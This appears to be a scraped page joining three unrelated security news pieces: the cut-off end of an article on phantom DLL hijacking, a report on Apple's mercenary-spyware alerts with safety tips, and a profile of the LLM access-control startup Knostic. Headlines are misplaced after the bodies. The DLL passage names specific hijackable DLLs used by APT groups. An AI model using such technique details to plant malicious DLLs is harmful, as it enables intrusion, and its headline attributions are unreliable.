To a hacker, a so-called "phantom" DLL file is like a blank canvas. They can simply create their own malicious DLLs with the same name, and write them to the same location, and they'll be loaded by the operating system with nobody the wiser.

The Lazarus Group and APT 41 (aka Winnti, Barium, Double Dragon) have used this tactic with IKEEXT, a service necessary for authentication and key exchange within Internet protocol security. When IKEEXT triggers, it attempts to load the nonexistent "wlbsctrl.dll." APT41 has also targeted other phantom DLLs like "wbemcomn.dll," loaded by the Windows Management Instrumentation (WMI) provider host.

Until Windows rids itself of phantom DLLs, Liang highly recommends companies run monitoring solutions, deploy proactive application controls, and automatically block remote loading of DLLs, a feature included by default in Windows Server.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

DPRK Exploits 2 MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse

Apple has sent alerts to people in 92 nations to say it's detected that they may have been a victim of a mercenary attack.

Apple has reportedly sent alerts to individuals in 92 nations on Wednesday, April 10, to say it’s detected that they may have been a victim of a mercenary attack. The company says it has sent out these types of threat notifications to over 150 countries since the start in 2021.

Mercenary spyware is used by governments to target people like journalists, political activists, and similar targets, and involves the use of sophisticated tools like Pegasus. Pegasus is one of the world’s most advanced and invasive spyware tools, known to utilize zero-day vulnerabilities against mobile devices.

The second number became known when Apple changed the wording of the relevant support page. The change also included the title that went from “About Apple threat notifications and protecting against **state-sponsored attacks**” to “About Apple threat notifications and protecting against **mercenary spyware**.”

If you look at the before and after, you’ll also notice an extra paragraph, again with the emphasis on the change from “state-sponsored attacks” to “mercenary spyware.”

The cause for the difference in wording might be because “state-sponsored” is often used to indicate attacks targeted at entities, like governments or companies, while these mercenary attacks tend to be directed at individual people.

The extra paragraph specifically calls out the NSO Group and the Pegasus spyware it sells. While the NSO Group claims to only sell to “government clients,” we have no reason to take its word for it.

Apple says that when it detects activity consistent with a mercenary spyware attack it uses two different means of notifying the users about the attack:

*   Displays a Threat Notification at the top of the page after the user signs into appleid.apple.com.
*   Sends an email and iMessage notification to the email addresses and phone numbers associated with the user’s Apple ID.

Apple says it doesn’t want to share information about what triggers these notifications, since that might help mercenary spyware attackers adapt their behavior to evade detection in the future.

The NSO Group itself argued in a court case started by Meta for spying on WhatsApp users, that it should be recognized as a foreign government agent and, therefore, be entitled to immunity under US law limiting lawsuits against foreign countries.

NSO Group has also said that its tool is increasingly necessary in an era when end-to-end encryption is widely available to criminals.

**How to stay safe**

Apple advises iPhone users to:

*   Enable Lockdown mode.
*   Keep devices up to date.
*   Protect devices with a passcode.
*   Use Multi-Factor-Authentication (MFA) for your Apple ID.
*   Only install apps from the App Store.
*   Use strong and unique passwords online.
*   Don’t click on links or attachments from unknown senders.

We’d like to add:

*   Use an anti-malware solution on your device.
*   If you’re not sure about something that’s been sent to you, verify it with the person or company via another communcation channel.
*   Use a password manager.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 Apple warns people of mercenary attacks via threat notification system 

Led by industry veterans Gadi Evron and Sounil Yu, the new company lets organizations adjust how much information LLMs provide based on the user's role and responsibilities.

Source: Deemerwha Studio via Shutterstock

Security startup Knostic is the latest company to address the various challenges organizations face as they adopt generative artificial intelligence (AI) tools. This week Knostic emerged from stealth with $3.3 million in pre-seed funding to bring "need-to-know" access controls to large language models (LLMs).

Enterprises in their AI transformation journey are sprinkling AI capabilities throughout their workflows and processes to boost productivity, reduce costs, and increase efficiency, says Gadi Evron, co-founder and CEO of Knostic. Enterprises are adopting LLMs to build ChatGPT-like enterprise search systems based on their own data sources or by enabling capabilities that are bundled into the applications and platforms they are already using. Data privacy is one of the biggest barriers to AI adoption, Evron says, noting that AI without controls potentially exposes the organization to increased risk, primarily by exposing information to the wrong people.

"How can we curate personalized information and actually give you value — answer with what you need to know instead of just saying stuff?" Evron says.

**Access Control for LLMs Is Necessary**

With Knostic, employees can access what they need and receive answers that align with the information they require to perform their jobs.

For example, an organization can have a system that answers questions such as features expected in the next product release, the latest sales numbers and revenue figures, bonus structure, due diligence results in a merger-and-acquisition scenario, or the status of an infrastructure project. But not everyone should get the same answer to every question. While the CFO and CTO needs to know the quarterly sales revenue, the marketing intern probably does not, Evron notes.

Knostic's access control engine considers whether the answer is appropriate for the questioner's role; if it is not, it answers with, "I'm sorry, that is confidential information," Evron says. Or instead of just saying no, the system can respond that even though the answer is confidential, the marketing campaigns that the intern worked on boosted sales over the quarter. That's where personalization and curation comes in.

Evron made it a point to emphasize that access control is binary — either the person can have access or they cannot. Knostic's focus on "need to know" makes it possible to provide some information even when the answer is no.

"When we say no, we are not enabling the business," Evron says, noting that providing information in a different format or with related context helps business users more than just being told no. "Once you figure out what you are allowed to know, you can solve DLP \[data loss prevention\] and IAM \[identity access management."

**What 'Need to Know' Looks Like**

When thinking about access control, organizations need to consider factors such as whether the system is internal or public-facing, whether the data used to generate responses is sensitive, and the role of the person asking the questions, says Sounil Yu, Knostic's co-founder and CTO.

There has been much discussion about how organizations need to build guardrails into AI systems to prevent abuse and not provide answers that could cause harm. However, this approach tend to be one-size-fits-all and doesn't account for a person's specific circumstances, Yu says. Consider how many publicly available chatbots would not provide medical information because they are not medical professionals and should not be used for diagnostics. But if it's a physician trying to access information as part of an investigation, that particular restriction is not helpful. Access control, unlike guardrails, take into account factors such as time, sensitivity of data, and person's role to determine how to shape the answers.

For example, a company may have a customer service chatbot that troubleshoots and assists in fixing common issues. That chatbot will have access to the same internal knowledgebase articles that the customer service representative would have. But what happens if there is information about a product that is not yet available on the market? The customer service representative needs that information to be ready when the product is available and even beforehand for training purposes. But there could be a lot of problems for that company if the customer learns details about the product from the chatbot before launch.

Instead of creating two systems — one for internal use and the other public-facing — the company can conceivably use Knostic's approach to provide different answers to the customer and to the customer service representative.

**Company Details**

Evron and Yu have deep industry expertise. Evron founded cyber deception company Cymmetria and previously held roles at Citibank and PwC. Yu is the former chief security scientist at Bank of America and former CISO and head of research at JupiterOne.

Knostic, founded in 2023, has raised $3.3 million in pre-seed financing from Shield Capital, Pitango First, DNS Ventures, Seedcamp, and several angel investors. Retired Admiral Mike Rogers, former head of the National Security Agency and a member of Knostic's advisory board, said in a statement that the startup will "unlock LLMs for enterprises."

Knostic has customers across a range of industries, including retail and financial services. It is also one of the top three finalists for the 2024 RSA Conference Launch Pad, where founders of companies incorporated for two years or less get to pitch ideas and products "on the cusp of being the next big thing" to a panel of venture capitalists. This year's Launch Pad will be on Tuesday, May 7.

**About the Author(s)**

As Dark Reading’s managing editor for features, Fahmida Y Rashid focuses on stories that provide security professionals with the information they need to do their jobs. She has spent over a decade analyzing news events and demystifying security technology for IT professionals and business managers. Prior to specializing in information security, Fahmida wrote about enterprise IT, especially networking, open source, and core internet infrastructure. Before becoming a journalist, she spent over 10 years as an IT professional -- and has experience as a network administrator, software developer, management consultant, and product manager. Her work has appeared in various business and test trade publications, including VentureBeat, CSO Online, InfoWorld, eWEEK, CRN, PC Magazine, and Tom’s Guide.

Tag

#auth